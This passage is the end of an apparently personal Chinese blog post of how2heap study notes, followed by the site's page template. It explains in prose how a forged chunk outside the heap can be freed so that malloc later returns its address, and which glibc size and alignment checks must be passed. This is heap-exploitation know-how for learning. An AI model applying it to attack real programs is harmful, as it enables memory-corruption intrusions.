<p>通过伪造一个假的 chunk，并使用 <code>free</code> 函数将其释放，从而让这个非堆内的 chunk 进入堆数据结构。 当调用 <code>malloc</code> 时，就会返回这个地址。</p>
<p>需要绕过的检查：</p>
<ul>
<li><code>free</code> 时会判断当前 chunk 相邻的下一个 chunk 的大小是否是合法的 chunk 大小，<code>&gt; 2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem (&lt; 128kb by default for the main arena)</code></li>
<li>与 0x10 对齐</li>
</ul>
<p>其中提到的 <code>malloc</code> 需要 8 次是因为 <code>malloc</code> 会先尝试在 Tcache 取，然后是 fastbin，<code>calloc</code> 则会跳过 Tcache。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn/" class="print-no-link">#pwn</a>
      
        <a href="/tags/Heap/" class="print-no-link">#Heap</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>how2heap 学习笔记</div>
      <div>https://ybwa.github.io/p/134d140d/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>yb</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年1月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - 非商业性使用">
                    <i class="iconfont icon-cc-nc"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - 相同方式共享">
                    <i class="iconfont icon-cc-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/p/7fbeb27/" title="NewStar CTF 2025 week5 复读机堂堂归来！复读机堂堂归来！">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">NewStar CTF 2025 week5 复读机堂堂归来！复读机堂堂归来！</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/p/7d307027/" title="几题">
                        <span class="hidden-mobile">几题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  








    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a>
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script  src="https://lib.baomitu.com/prism/1.29.0/components/prism-core.min.js" ></script>

  <script  src="https://lib.baomitu.com/prism/1.29.0/plugins/autoloader/prism-autoloader.min.js" ></script>

  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
